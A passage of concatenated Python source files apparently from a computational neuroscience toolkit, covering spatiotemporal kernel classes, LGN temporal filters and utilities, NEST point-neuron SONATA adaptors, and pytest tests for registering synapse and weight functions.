mpl_toolkits.axes_grid1 import make_axes_locatable if ax is None: _, ax = plt.subplots(1, 1) if colorbar: divider = make_axes_locatable(ax) cax = divider.append_axes("right", size="5%", pad=0.05) data = self.full() if clim is not None: im = ax.imshow(data, extent=(self.col_range[0], self.col_range[-1], self.row_range[0], self.row_range[-1]), origin='lower', clim=clim, interpolation='none') else: im = ax.imshow(data, extent=(self.col_range[0], self.col_range[-1], self.row_range[0], self.row_range[-1]), origin='lower', interpolation='none') if colorbar: plt.colorbar(im, cax=cax) if save_file_name is not None: plt.savefig(save_file_name, transparent=True) if show: plt.show() return ax, data def __len__(self): return len(self.kernel) class Kernel3D(object): def rescale(self): if np.abs(self.kernel.sum()) != 0: self.kernel /= np.abs(self.kernel.sum()) def normalize(self): self.kernel /= (self.kernel.sum())*np.sign(self.kernel.sum()) @classmethod def copy(cls, instance): return cls(instance.row_range.copy(), instance.col_range.copy(), instance.t_range.copy(), instance.row_inds.copy(), instance.col_inds.copy(), instance.t_inds.copy(), instance.kernel.copy()) def __len__(self): return len(self.kernel) def __init__(self, row_range, col_range, t_range, row_inds, col_inds, t_inds, kernel): self.col_range = np.array(col_range) self.row_range = np.array(row_range) self.t_range = np.array(t_range) self.col_inds = np.array(col_inds) self.row_inds = np.array(row_inds) self.t_inds = np.array(t_inds) self.kernel = np.array(kernel) assert len(self.row_inds) == len(self.col_inds) assert len(self.row_inds) == len(self.t_inds) assert len(self.row_inds) == len(self.kernel) def apply_threshold(self, threshold): inds_to_keep = np.where(np.abs(self.kernel) > threshold) self.row_inds = self.row_inds[inds_to_keep] self.col_inds = self.col_inds[inds_to_keep] self.t_inds = self.t_inds[inds_to_keep] self.kernel = self.kernel[inds_to_keep] def __add__(self, other): if len(other) == 0: return self try: if not (len(self.row_range) == 0 or len(other.row_range) == 0): np.testing.assert_almost_equal(self.row_range, other.row_range) if not (len(self.col_range) == 0 or len(other.col_range) == 0): np.testing.assert_almost_equal(self.col_range, other.col_range) if not (len(self.t_range) == 0 or len(other.t_range) == 0): np.testing.assert_almost_equal(self.t_range, other.t_range) except: raise Exception('Kernels must exist on same grid to be added') if len(self.row_range) == 0: row_range = other.row_range.copy() else: row_range = self.row_range.copy() if len(self.col_range) == 0: col_range = other.col_range.copy() else: col_range = self.col_range.copy() if len(self.t_range) == 0: t_range = other.t_range.copy() else: t_range = self.t_range.copy() kernel_dict = {} for key, ker in zip(zip(self.row_inds, self.col_inds, self.t_inds), self.kernel): kernel_dict[key] = kernel_dict.setdefault(key, 0) + ker for key, ker in zip(zip(other.row_inds, other.col_inds, other.t_inds), other.kernel): kernel_dict[key] = kernel_dict.setdefault(key, 0) + ker key_list, kernel_list = zip(*kernel_dict.items()) row_inds_list, col_inds_list, t_inds_list = zip(*key_list) row_inds = np.array(row_inds_list) col_inds = np.array(col_inds_list) t_inds = np.array(t_inds_list) kernel = np.array(kernel_list) return Kernel3D(row_range, col_range, t_range, row_inds, col_inds, t_inds, kernel) def __mul__(self, constant): new_copy = Kernel3D.copy(self) new_copy.kernel *= constant return new_copy def t_slice(self, t): ind_list = find_l_r_in_t_range(self.t_range, t) if ind_list is None: return None elif len(ind_list) == 1: t_ind_i = ind_list[0] inds_i = np.where(self.t_range[self.t_inds] == self.t_range[t_ind_i]) row_inds = self.row_inds[inds_i] col_inds = self.col_inds[inds_i] kernel = self.kernel[inds_i] return Kernel2D(self.row_range, self.col_range, row_inds, col_inds, kernel) else: t_ind_l, t_ind_r = ind_list t_l, t_r = self.t_range[t_ind_l], self.t_range[t_ind_r] inds_l = np.where(self.t_range[self.t_inds] == self.t_range[t_ind_l]) inds_r = np.where(self.t_range[self.t_inds] == self.t_range[t_ind_r]) row_inds_l = self.row_inds[inds_l] col_inds_l = self.col_inds[inds_l] kernel_l = self.kernel[inds_l] kl = Kernel2D(self.row_range, self.col_range, row_inds_l, col_inds_l, kernel_l) row_inds_r = self.row_inds[inds_r] col_inds_r = self.col_inds[inds_r] kernel_r = self.kernel[inds_r] kr = Kernel2D(self.row_range, self.col_range, row_inds_r, col_inds_r, kernel_r) wa, wb = (1-(t-t_l)/(t_r-t_l)), (1-(t_r-t)/(t_r-t_l)) return kl*wa + kr*wb def full(self, truncate_t=True): data = np.zeros((len(self.t_range), len(self.row_range), len(self.col_range))) data[self.t_inds, self.row_inds, self.col_inds] = self.kernel if truncate_t: ind_max = np.where(np.abs(data) > 0)[0].min() return data[ind_max:, :, :] else: return data def imshow(self, ax=None, t_range=None, cmap=cm.bwr, N=10, show=True, save_file_name=None, kvals=None): if ax is None: fig = plt.figure() ax = fig.gca(projection='3d') if t_range is None: t_range = self.t_range slice_list_sparse = [self.t_slice(t) for t in t_range] slice_list = [] slice_t_list = [] for curr_slice, curr_t in zip(slice_list_sparse, t_range): if not curr_slice is None: slice_list.append(curr_slice.full()) slice_t_list.append(curr_t) all_slice_max = max(map(np.max, slice_list)) all_slice_min = min(map(np.min, slice_list)) upper_bound = max(np.abs(all_slice_max), np.abs(all_slice_min)) lower_bound = -upper_bound norm = mpl.colors.Normalize(vmin=lower_bound, vmax=upper_bound) color_mapper = cm.ScalarMappable(norm=norm, cmap=cmap).to_rgba if kvals is None: kvals = np.linspace(lower_bound, upper_bound, N) X, Y = np.meshgrid(self.row_range, self.col_range) contour_dict = {} for kval in kvals: for t_val, curr_slice in zip(slice_t_list, slice_list): x_contour, y_contour = get_contour(Y, X, curr_slice.T, kval) contour_dict[kval, t_val] = x_contour, y_contour color = color_mapper(kval) color = color[0], color[1], color[2], np.abs(kval)/upper_bound plot_single_contour(ax, x_contour, y_contour, t_val, color) ax.set_zlim(self.row_range[0], self.row_range[-1]) ax.set_ylim(self.t_range[0], self.t_range[-1]) ax.set_xlim(self.col_range[0], self.col_range[-1]) if save_file_name is not None: plt.savefig(save_file_name, transparent=True) if show: plt.show() return ax, contour_dict def merge_spatial_temporal(spatial_kernel, temporal_kernel, threshold=0): t_range = temporal_kernel.t_range spatiotemporal_kernel = np.ones((len(temporal_kernel), len(spatial_kernel))) spatiotemporal_kernel *= spatial_kernel.kernel[None, :] spatiotemporal_kernel *= temporal_kernel.kernel[:, None] spatiotemporal_kernel = spatiotemporal_kernel.reshape((np.prod(spatiotemporal_kernel.shape))) spatial_coord_array = np.empty((len(spatial_kernel), 2)) spatial_coord_array[:, 0] = spatial_kernel.col_inds spatial_coord_array[:, 1] = spatial_kernel.row_inds spatiiotemporal_coord_array = np.zeros((len(spatial_kernel)*len(temporal_kernel), 3)) spatiiotemporal_coord_array[:, 0:2] = np.kron(np.ones((len(temporal_kernel), 1)), spatial_coord_array) spatiiotemporal_coord_array[:, 2] = np.kron(temporal_kernel.t_inds, np.ones(len(spatial_kernel))) col_inds, row_inds, t_inds = map(lambda x: x.astype(np.int), spatiiotemporal_coord_array.T) kernel = Kernel3D(spatial_kernel.row_range, spatial_kernel.col_range, t_range, row_inds, col_inds, t_inds, spatiotemporal_kernel) kernel.apply_threshold(threshold) return kernel ``` #### File: filternet/lgnmodel/temporalfilter.py ```python import numpy as np import scipy.interpolate as spinterp from . import fitfuns from .kernel import Kernel1D class TemporalFilter(object): def __init__(self): self.t_support = [] self.kernel_data = None def imshow(self, t_range=None, threshold=0, reverse=False, rescale=False, **kwargs): return self.get_kernel(t_range, threshold, reverse, rescale).imshow(**kwargs) def to_dict(self): return {'class': (__name__, self.__class__.__name__)} def get_default_t_grid(self): raise NotImplementedError() def get_kernel(self, t_range=None, threshold=0, reverse=False, rescale=False): if t_range is None: t_range = self.get_default_t_grid() if len(self.t_support) == 1: k = Kernel1D(self.t_support, self.kernel_data, threshold=threshold, reverse=reverse) else: interpolation_function = spinterp.interp1d(self.t_support, self.kernel_data, fill_value=0, bounds_error=False, assume_sorted=True) k = Kernel1D(t_range, interpolation_function(t_range), threshold=threshold, reverse=reverse) if rescale: k.rescale() assert(np.abs(np.abs(k.kernel.sum()) - 1) < 1e-14) return k class ArrayTemporalFilter(TemporalFilter): def __init__(self, mask, t_support): super(ArrayTemporalFilter, self).__init__() self.mask = mask self.t_support = t_support assert(len(self.mask) == len(self.t_support)) self.nkt = 600 self.kernel_data = self.mask def get_default_t_grid(self): return np.arange(self.nkt)*0.001 class TemporalFilterCosineBump(TemporalFilter): def __init__(self, weights, kpeaks, delays): """Creates a time-based filter function by combining two cosine-based peaks into a function for convoluting the input with. :param weights: (float, float)the magntiude of both peaks, first weight must be positive :param kpeaks: (float, float) the spread of each peak, first peak (0) must be sharper :param delays: (float, float) the delay of both peaks, peak 0 must be positive occur first. """ assert(len(kpeaks) == 2) assert(kpeaks[0] < kpeaks[1]) assert(weights[0] > 0) assert(delays[0] <= delays[1]) super(TemporalFilterCosineBump, self).__init__() self.ncos = len(weights) # Not likely to change defaults: self.neye = 0 self.b = .3 self.nkt = 600 # Parameters self.weights = np.array([weights]).T self.kpeaks = kpeaks self.delays = np.array([delays]).astype(int) # Create two peak arrays (arr0 and arr1) using makeBasisStimKernel. Then merge them using dot product # w0*arr0 + w1*arr1. kbasprs = { 'neye': self.neye, 'ncos': self.ncos, 'kpeaks': self.kpeaks, 'b': self.b, 'delays': self.delays } nkt = self.nkt self.kernel_data = np.dot(fitfuns.makeBasis_StimKernel(kbasprs, nkt), self.weights)[::-1].T[0] self.t_support = np.arange(0, len(self.kernel_data)*.001, .001) self.kbasprs = kbasprs assert len(self.t_support) == len(self.kernel_data) def __call__(self, t): return self.interpolation_function(t) def get_default_t_grid(self): return np.arange(self.nkt)*.001 def to_dict(self): param_dict = super(TemporalFilterCosineBump, self).to_dict() param_dict.update({'weights': self.weights.tolist(), 'kpeaks': self.kpeaks}) return param_dict ``` #### File: filternet/lgnmodel/util_fns.py ```python import os import re import numpy as np import scipy.io as sio from scipy.fftpack import fft import pandas as pd from .movie import Movie, FullFieldFlashMovie pd.set_option('display.width', 1000) pd.set_option('display.max_columns', 100) ################################################# def chunks(l, n): """Yield successive n-sized chunks from l.""" for i in range(0, len(l), n): yield l[i:i + n] ################################################## def compute_FFT_OneCycle(FR, TF, downsample): one_cyc = np.int(((1000. / downsample) / TF)) FR_cyc = list(chunks(FR, one_cyc)) if (TF == 15. or TF == 8.): FR_cyc = FR_cyc[:-1] FR_cyc_avg = np.mean(FR_cyc, axis=0) y = FR_cyc_avg AMP = 2 * np.abs(fft(y) / len(y)) F0 = 0.5 * AMP[0] assert (F0 - np.mean(y) < 1.e-4) F1 = AMP[1] return F0, F1 ################################################## def create_ff_mov(frame_rate, tst, tend, xrng, yrng): ff_mov_on = FullFieldFlashMovie(np.arange(xrng), np.arange(yrng), tst, tend, frame_rate=frame_rate, max_intensity=1).full(t_max=tend) # +0.5) ff_mov_off = FullFieldFlashMovie(np.arange(xrng), np.arange(yrng), tst, tend, frame_rate=frame_rate, max_intensity=-1).full(t_max=tend) # +0.5) return ff_mov_on, ff_mov_off ################################################## def create_grating_movie_list(gr_dir_name): gr_fnames = os.listdir(gr_dir_name) gr_fnames_ord = sorted(gr_fnames, key=lambda x: (int(re.sub('\D', '', x)), x)) gr_mov_list = [] for fname in gr_fnames_ord[:5]: movie_file = os.path.join(gr_dir_name, fname) m_file = sio.loadmat(movie_file) m_data_raw = m_file['mov'].T swid = np.shape(m_data_raw)[1] res = int(np.sqrt(swid / (8 * 16))) m_data = np.reshape(m_data_raw, (3000, 8 * res, 16 * res)) m1 = Movie(m_data[:500, :, :], row_range=np.linspace(0, 120, m_data.shape[1], endpoint=True), col_range=np.linspace(0, 120, m_data.shape[2], endpoint=True), frame_rate=1000.) gr_mov_list.append(m1) return gr_mov_list """ ################################################## metrics_dir = os.path.join(os.path.dirname(__file__), 'cell_metrics') def get_data_metrics_for_each_subclass(ctype): # Load csv file into dataframe if ctype.find('_sus') >= 0: prs_fn = os.path.join(metrics_dir, '{}_cells_v3.csv'.format(ctype)) else: prs_fn = os.path.join(metrics_dir, '{}_cell_data.csv'.format(ctype)) prs_df = pd.read_csv(prs_fn) N_class, nmet = np.shape(prs_df) # Group data by subclasses based on max F0 vals exp_df = prs_df.iloc[:, [13, 14, 17, 18, 28, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54]].copy() # Bl_lat,Wh_lat,Bl_si, wh_si, spont, 5 F0s, 5 F1s sub_df = exp_df.iloc[:, [5, 6, 7, 8, 9]] exp_df['max_tf'] = sub_df.idxmax(axis=1).values # sub_df.idxmax(axis=1) exp_means = exp_df.groupby(['max_tf']).mean() exp_std = exp_df.groupby(['max_tf']).std() exp_nsub = exp_df.groupby(['max_tf']).size() max_ind_arr = np.where(exp_nsub == np.max(exp_nsub)) max_nsub_ind = max_ind_arr[0][0] # Get means and std dev for subclasses exp_prs_dict = {} for scn in np.arange(len(exp_nsub)): f0_exp = exp_means.iloc[scn, 5:10].values f1_exp = exp_means.iloc[scn, 10:].values spont_exp = exp_means.iloc[scn, 4:5].values if ctype.find('OFF') >= 0: si_exp = exp_means.iloc[scn, 2:3].values ttp_exp = exp_means.iloc[scn, 0:1].values elif ctype.find('ON') >= 0: si_exp = exp_means.iloc[scn, 3:4].values ttp_exp = exp_means.iloc[scn, 1:2].values else: si_exp = np.NaN * np.ones((1, 5)) ttp_exp = np.NaN * np.ones((1, 2)) nsub = exp_nsub.iloc[scn] if nsub == 1: f0_std = np.mean(exp_std.iloc[max_nsub_ind, 5:10].values) * np.ones((1, 5)) f1_std = np.mean(exp_std.iloc[max_nsub_ind, 10:].values) * np.ones((1, 5)) spont_std = np.mean(exp_std.iloc[max_nsub_ind, 4:5].values) * np.ones((1, 5)) if ctype.find('OFF') >= 0: si_std = np.mean(exp_std.iloc[max_nsub_ind, 2:3].values) * np.ones((1, 5)) elif ctype.find('ON') >= 0: si_std = np.mean(exp_std.iloc[max_nsub_ind, 3:4].values) * np.ones((1, 5)) else: si_std = np.NaN * np.ones((1, 5)) else: f0_std = exp_std.iloc[scn, 5:10].values f1_std = exp_std.iloc[scn, 10:].values spont_std = exp_std.iloc[scn, 4:5].values if ctype.find('OFF') >= 0: si_std = exp_std.iloc[scn, 2:3].values elif ctype.find('ON') >= 0: si_std = exp_std.iloc[scn, 3:4].values else: si_std = np.NaN * np.ones((1, 5)) if ctype.find('t') >= 0: tcross = 40. si_inf_exp = (si_exp - tcross / 200.) * (200. / (200. - tcross - 40.)) elif ctype.find('s') >= 0: tcross = 60. si_inf_exp = (si_exp - tcross / 200.) * (200. / (200. - tcross - 40.)) else: si_inf_exp = np.nan dict_key = exp_means.iloc[scn].name[3:] exp_prs_dict[dict_key] = {} exp_prs_dict[dict_key]['f0_exp'] = f0_exp exp_prs_dict[dict_key]['f1_exp'] = f1_exp exp_prs_dict[dict_key]['spont_exp'] = spont_exp exp_prs_dict[dict_key]['si_exp'] = si_exp exp_prs_dict[dict_key]['si_inf_exp'] = si_inf_exp exp_prs_dict[dict_key]['ttp_exp'] = ttp_exp exp_prs_dict[dict_key]['f0_std'] = f0_std exp_prs_dict[dict_key]['f1_std'] = f1_std exp_prs_dict[dict_key]['spont_std'] = spont_std exp_prs_dict[dict_key]['si_std'] = si_std exp_prs_dict[dict_key]['nsub'] = nsub exp_prs_dict[dict_key]['N_class'] = N_class return exp_prs_dict """ ################################################## def check_optim_results_against_bounds(bounds, opt_wts, opt_kpeaks): bds_wts0 = bounds[0] bds_wts1 = bounds[1] bds_kp0 = bounds[2] bds_kp1 = bounds[3] opt_wts0 = opt_wts[0] opt_wts1 = opt_wts[1] opt_kp0 = opt_kpeaks[0] opt_kp1 = opt_kpeaks[1] if (opt_wts0 == bds_wts0[0] or opt_wts0 == bds_wts0[1]): prm_on_bds = 'w0' elif (opt_wts1 == bds_wts1[0] or opt_wts1 == bds_wts1[1]): prm_on_bds = 'w1' elif (opt_kp0 == bds_kp0[0] or opt_kp0 == bds_kp0[1]): prm_on_bds = 'kp0' elif (opt_kp1 == bds_kp1[0] or opt_kp1 == bds_kp1[1]): prm_on_bds = 'kp1' else: prm_on_bds = 'None' return prm_on_bds def cross_from_above(x, threshold): """Return the indices into *x* where *x* crosses some threshold from above.""" x = np.asarray(x) ind = np.nonzero((x[:-1] >= threshold) & (x[1:] < threshold))[0] if len(ind): return ind+1 else: return ind ####################################################### def get_tcross_from_temporal_kernel(temporal_kernel): max_ind = np.argmax(temporal_kernel) min_ind = np.argmin(temporal_kernel) temp_tcross_ind = cross_from_above(temporal_kernel[max_ind:min_ind], 0.0) tcross_ind = max_ind + temp_tcross_ind[0] return tcross_ind ``` #### File: simulator/pointnet/sonata_adaptors.py ```python import numpy as np from collections import Counter import numbers import nest import types import pandas as pd from bmtk.simulator.core.sonata_reader import NodeAdaptor, SonataBaseNode, EdgeAdaptor, SonataBaseEdge from bmtk.simulator.pointnet.io_tools import io from bmtk.simulator.pointnet.pyfunction_cache import py_modules from bmtk.simulator.pointnet.glif_utils import convert_aibs2nest def all_null(node_group, column_name): """Helper function to determine if a column has any non-NULL values""" types_table = node_group.parent.types_table non_null_vals = [types_table[ntid][column_name] for ntid in np.unique(node_group.node_type_ids) if types_table[ntid][column_name] is not None] return len(non_null_vals) == 0 class PointNodeBatched(object): def __init__(self, node_ids, gids, node_types_table, node_type_id): self._n_nodes = len(node_ids) self._node_ids = node_ids self._gids = gids self._nt_table = node_types_table self._nt_id = node_type_id self._nest_ids = [] @property def n_nodes(self): return self._n_nodes @property def node_ids(self): return self._node_ids @property def gids(self): return self._gids @property def nest_ids(self): return self._nest_ids @property def nest_model(self): return self._nt_table[self._nt_id]['model_template'].split(':')[1] @property def nest_params(self): return self._nt_table[self._nt_id]['dynamics_params'] @property def model_type(self): return self._nt_table[self._nt_id]['model_type'] def build(self): self._nest_ids = nest.Create(self.nest_model, self.n_nodes, self.nest_params) class PointNode(SonataBaseNode): def __init__(self, node, prop_adaptor): super(PointNode, self).__init__(node, prop_adaptor) self._nest_ids = [] @property def n_nodes(self): return 1 @property def node_ids(self): return [self._prop_adaptor.node_id(self._node)] @property def gids(self): return [self._prop_adaptor.gid(self._node)] @property def nest_ids(self): return self._nest_ids @property def nest_model(self): return self._prop_adaptor.model_template(self._node)[1] @property def nest_params(self): return self.dynamics_params def build(self): nest_model = self.nest_model dynamics_params = self.dynamics_params fnc_name = self._node['model_processing'] if fnc_name is None: self._nest_ids = nest.Create(nest_model, 1, dynamics_params) else: cell_fnc = py_modules.cell_processor(fnc_name) self._nest_ids = cell_fnc(nest_model, self._node, dynamics_params) class PointNodeAdaptor(NodeAdaptor): def __init__(self, network): super(PointNodeAdaptor, self).__init__(network) # Flag for determining if we can build multiple NEST nodes at once. If each individual node has unique # NEST params or a model_processing function is being called then we must nest.Create for each individual cell. # Otherwise we can try to call nest.Create for a batch of nodes that share the same properties self._can_batch = True @property def batch_process(self): return self._can_batch @batch_process.setter def batch_process(self, flag): self._can_batch = flag def get_node(self, sonata_node): return PointNode(sonata_node, self) def get_batches(self, node_group): node_ids = node_group.node_ids node_type_ids = node_group.node_type_ids node_gids = node_group.gids if node_gids is None: node_gids = node_ids ntids_counter = Counter(node_type_ids) nid_groups = {nt_id: np.zeros(ntids_counter[nt_id], dtype=np.uint32) for nt_id in ntids_counter} gid_groups = {nt_id: np.zeros(ntids_counter[nt_id], dtype=np.uint32) for nt_id in ntids_counter} node_groups_counter = {nt_id: 0 for nt_id in ntids_counter} for node_id, gid, node_type_id in zip(node_ids, node_gids, node_type_ids): grp_indx = node_groups_counter[node_type_id] nid_groups[node_type_id][grp_indx] = node_id gid_groups[node_type_id][grp_indx] = gid node_groups_counter[node_type_id] += 1 return [PointNodeBatched(nid_groups[nt_id], gid_groups[nt_id], node_group.parent.node_types_table, nt_id) for nt_id in ntids_counter] @staticmethod def preprocess_node_types(network, node_population): NodeAdaptor.preprocess_node_types(network, node_population) node_types_table = node_population.types_table if 'model_template' in node_types_table.columns and 'dynamics_params' in node_types_table.columns: node_type_ids = np.unique(node_population.type_ids) for nt_id in node_type_ids: node_type_attrs = node_types_table[nt_id] mtemplate = node_type_attrs['model_template'] dyn_params = node_type_attrs['dynamics_params'] if mtemplate.startswith('nest:glif') and dyn_params.get('type', None) == 'GLIF': model_template, dynamics_params = convert_aibs2nest(mtemplate, dyn_params) node_type_attrs['model_template'] = model_template node_type_attrs['dynamics_params'] = dynamics_params @staticmethod def patch_adaptor(adaptor, node_group, network): node_adaptor = NodeAdaptor.patch_adaptor(adaptor, node_group, network) # If dynamics params is stored in the nodes.h5 then we have to build each node separate if node_group.has_dynamics_params: node_adaptor.batch_process = False # If there is a non-null value in the model_processing column then it potentially means that every cell is # uniquly built (currently model_processing is applied to each individ. cell) and nodes can't be batched if 'model_processing' in node_group.columns: node_adaptor.batch_process = False elif 'model_processing' in node_group.all_columns and not all_null(node_group, 'model_processing'): node_adaptor.batch_process = False if node_adaptor.batch_process: io.log_info('Batch processing nodes for {}/{}.'.format(node_group.parent.name, node_group.group_id)) return node_adaptor class PointEdge(SonataBaseEdge): @property def source_node_ids(self): return [self._edge.source_node_id] @property def target_node_ids(self): return [self._edge.target_node_id] @property def nest_params(self): if self.model_template in py_modules.synapse_models: src_node = self._prop_adaptor._network.get_node_id(self.source_population, self.source_node_id) trg_node = self._prop_adaptor._network.get_node_id(self.target_population, self.target_node_id) syn_model_fnc = py_modules.synapse_model(self.model_template) else: src_node = None trg_node = None syn_model_fnc = py_modules.synapse_models('default') return syn_model_fnc(self, src_node, trg_node) class PointEdgeBatched(object): def __init__(self, source_nids, target_nids, nest_params): self._src_nids = source_nids self._trg_nids = target_nids self._nest_params = nest_params @property def source_node_ids(self): return self._src_nids @property def target_node_ids(self): return self._trg_nids @property def nest_params(self): return self._nest_params class PointEdgeAdaptor(EdgeAdaptor): def __init__(self, network): super(PointEdgeAdaptor, self).__init__(network) self._can_batch = True @property def batch_process(self): return self._can_batch @batch_process.setter def batch_process(self, flag): self._can_batch = flag def synaptic_params(self, edge): # TODO: THIS NEEDS to be replaced with call to synapse_models params_dict = {'weight': self.syn_weight(edge, None, None), 'delay': edge.delay} params_dict.update(edge.dynamics_params) return params_dict def get_edge(self, sonata_node): return PointEdge(sonata_node, self) @staticmethod def preprocess_edge_types(network, edge_population): # Fix for sonata/300_pointneurons EdgeAdaptor.preprocess_edge_types(network, edge_population) edge_types_table = edge_population.types_table edge_type_ids = np.unique(edge_population.type_ids) for et_id in edge_type_ids: edge_type = edge_types_table[et_id] if 'model_template' in edge_types_table.columns: model_template = edge_type['model_template'] if model_template.startswith('nest'): edge_type['model_template'] = model_template[5:] def get_batches(self, edge_group): src_ids = {} trg_ids = {} edge_types_table = edge_group.parent.edge_types_table edge_type_ids = edge_group.edge_type_ids et_id_counter = Counter(edge_type_ids) tmp_df = pd.DataFrame({'etid': edge_type_ids, 'src_nids': edge_group.src_node_ids, 'trg_nids': edge_group.trg_node_ids}) if 'nsyns' in edge_group.columns: tmp_df['nsyns'] = edge_group.get_dataset('nsyns') if 'syn_weight' in edge_group.columns: tmp_df['syn_weight'] = edge_group.get_dataset('syn_weight') if 'delay' in edge_group.columns: tmp_df['delay'] = edge_group.get_dataset('delay') #for et_id, grp_vals in tmp_df.groupby('etid'): # src_ids[et_id] = np.array(grp_vals['src_nids']) # trg_ids[et_id] = np.array(grp_vals['trg_nids']) type_params = {edge_id: {} for edge_id in et_id_counter.keys()} src_pop = edge_group.parent.source_population trg_pop = edge_group.parent.target_population grp_df = None src_nodes_df = None trg_nodes_df = None for edge_id, grp_vals in tmp_df.groupby('etid'): edge_props = edge_types_table[edge_id] # Get the model type type_params[edge_id]['model'] = edge_props['model_template'] # Add dynamics params # TODO: Add to dataframe and if a part of hdf5 we can return any dynamics params as a list type_params[edge_id].update(edge_props['dynamics_params']) # get the delay parameter if 'delay' in grp_vals.columns: type_params[edge_id]['delay'] = grp_vals['delay'] elif 'delay' in edge_props.keys(): type_params[edge_id]['delay'] = edge_props['delay'] weight_function = edge_types_table[edge_id].get('weight_function', None) if weight_function is not None: if grp_df is None: grp_df = edge_group.to_dataframe() src_nodes_df = self._network.get_nodes_df(src_pop) trg_nodes_df = self._network.get_nodes_df(trg_pop) edges = grp_df[grp_df['edge_type_id'] == edge_id] target_nodes = trg_nodes_df.loc[edges['target_node_id'].values] source_nodes = src_nodes_df.loc[edges['source_node_id'].values] weight_fnc = py_modules.synaptic_weight(weight_function) type_params[edge_id]['weight'] = weight_fnc(edges, source_nodes, target_nodes) else: # Get nsyns as either an array or a constant. If not explcitiy specified assume nsyns = 1 if 'nsyns' in grp_vals.columns: nsyns = grp_vals['nsyns'].values else: nsyns = edge_props.get('nsyns', 1) # get syn_weight as either an array or constant. If not explicity stated throw an error if 'syn_weight' in grp_vals.columns: syn_weight = grp_vals['syn_weight'].values elif 'syn_weight' in edge_props.keys(): syn_weight = edge_props['syn_weight'] else: # TODO: Make more explicity. Or default to syn_weight of 0 raise Exception('Could not find syn_weight value') # caluclate weight type_params[edge_id]['weight'] = nsyns * syn_weight yield PointEdgeBatched(source_nids=grp_vals['src_nids'].values, target_nids=grp_vals['trg_nids'].values, nest_params=type_params[edge_id]) @staticmethod def patch_adaptor(adaptor, edge_group): edge_adaptor = EdgeAdaptor.patch_adaptor(adaptor, edge_group) if 'weight_function' not in edge_group.all_columns and 'syn_weight' in edge_group.all_columns: adaptor.syn_weight = types.MethodType(point_syn_weight, adaptor) #else: # edge_adaptor.batch_process = False return edge_adaptor def point_syn_weight(self, edge, src_node, trg_node): return edge['syn_weight']*edge.nsyns ``` #### File: simulator/bionet/test_nrn.py ```python import pytest from .conftest import * @pytest.mark.skipif(not nrn_installed, reason='NEURON is not installed') def test_weight(): def wmax(v1, v2): return max(v1, v2) def wmin(v1, v2): return min(v1, v2) add_weight_function(wmax) add_weight_function(wmin, 'minimum') assert('wmax' in py_modules.synaptic_weights) assert('minimum' in py_modules.synaptic_weights) assert('wmin' not in py_modules.synaptic_weights) wmax_fnc = py_modules.synaptic_weight('wmax') assert(wmax_fnc(1, 2) == 2) wmin_fnc = py_modules.synaptic_weight('minimum') assert(wmin_fnc(1, 2) == 1) py_modules.clear() @pytest.mark.skipif(not nrn_installed, reason='NEURON is not installed') def test_weight_decorator(): @synaptic_weight def wmax(v1, v2): return max(v1, v2) @synaptic_weight(name='minimum') def wmin(v1, v2): return min(v1, v2) assert('wmax' in py_modules.synaptic_weights) assert('minimum' in py_modules.synaptic_weights) assert('wmin' not in py_modules.synaptic_weights) wmax_fnc = py_modules.synaptic_weight('wmax') assert(wmax_fnc(1, 2) == 2) wmin_fnc = py_modules.synaptic_weight('minimum') assert(wmin_fnc(1, 2) == 1) py_modules.clear() @pytest.mark.skipif(not nrn_installed, reason='NEURON is not installed') def test_synapse_model(): def syn1(): return 'Syn1' def syn2(p1, p2): return p1, p2 add_synapse_model(syn1) add_synapse_model(syn2, 'synapse_2') assert('syn1' in py_modules.synapse_models) assert('synapse_2' in py_modules.synapse_models) assert('syn2' not in py_modules.synapse_models) syn_fnc = py_modules.synapse_model('syn1') assert(syn_fnc() == 'Syn1') syn_fnc = py_modules.synapse_model('synapse_2') assert(syn_fnc(1, 2) == (1, 2)) py_modules.clear() @pytest.mark.skipif(not nrn_installed, reason='NEURON is not installed') def test_synapse_model_decorator(): @synapse_model def syn1(): return 'Syn1' @synapse_model(name='synapse_2') def syn2(p1, p2): return p1, p2 assert('syn1' in py_modules.synapse_models) assert('synapse_2' in py_modules.synapse_models) assert('syn2' not in py_modules.synapse_models) syn_fnc = py_modules.synapse_model('syn1') assert(syn_fnc() == 'Syn1') syn_fnc = py_modules.synapse_model('synapse_2') assert(syn_fnc(1, 2) == (1, 2)) py_modules.clear() @pytest.mark.skip() def test_cell_model(): def hoc1(): return "hoc" def hoc2(p1): return p1 add_cell_model(hoc1) add_cell_model(hoc2, name='hoc_function') assert('hoc1' in py_modules.cell_models) assert('hoc_function' in py_modules.cell_models) assert('hoc2' not in py_modules.cell_models) hoc_fnc = py_modules.cell_model('hoc1') assert(hoc_fnc() == 'hoc') hoc_fnc = py_modules.cell_model('hoc_function') assert(hoc_fnc(1.0) == 1.0) @pytest.mark.skip() def test_cell_model_decorator(): @cell_model def hoc1(): return "hoc" @cell_model(name='hoc_function') def hoc2(p1): return p1 assert('hoc1' in py_modules.cell_models) assert('hoc_function' in py_modules.cell_models) assert('hoc2' not in py_modules.cell_models) hoc_fnc = py_modules.cell_model('hoc1') assert(hoc_fnc() == 'hoc') hoc_fnc = py_modules.cell_model('hoc_function') assert(hoc_fnc(1.0) == 1.0) @pytest.mark.skip() def test_load_py_modules(): import set_weights import set_syn_params import set_cell_params load_py_modules(cell_models=set_cell_params, syn_models=set_syn_params, syn_weights=set_weights) assert(all(n in py_modules.cell_models for n in ['Biophys1', 'IntFire1'])) assert(isinstance(py_modules.cell_model('Biophys1'), types.FunctionType)) assert (isinstance(py_modules.cell_model('IntFire1'), types.FunctionType)) assert (all(n in py_modules.synapse_models for n in ['exp2syn'])) assert (isinstance(py_modules.synapse_model('exp2syn'), types.FunctionType)) assert (all(n in py_modules.synaptic_weights for n in ['wmax', 'gaussianLL'])) assert (isinstance(py_modules.synaptic_weight('wmax'), types.FunctionType)) assert (isinstance(py_modules.synaptic_weight('gaussianLL'), types.FunctionType)) ``` #### File: simulator/pointnet/pointnet_virtual_files.py ```python import numpy as np class NodeRow(object): @property def with_dynamics_params(self): return False class NodesFile(object): def __init__(self, N): self._network_name = 'test_bionet' self._version = None self._iter_index = 0 self._nrows = 0 self._node_types_table = None self._N = N self._rot_delta = 360.0/float(N) self._node_types_table = { 101: { 'pop_name': 'Rorb', 'node_type_id': 101, 'model_type': 'iaf_psc_alpha', 'dynamics_params': 'iaf_dynamics.json', 'ei': 'e' }, 102: { 'pop_name': 'PV1', 'node_type_id': 102, 'model_type': 'izhikevich', 'dynamics_params': 'iz_dynamics.json', 'ei': 'i' } } @property def 